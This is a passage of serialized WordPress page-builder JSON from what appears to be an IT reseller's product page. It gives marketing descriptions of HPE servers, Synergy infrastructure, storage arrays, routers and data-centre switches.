id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" 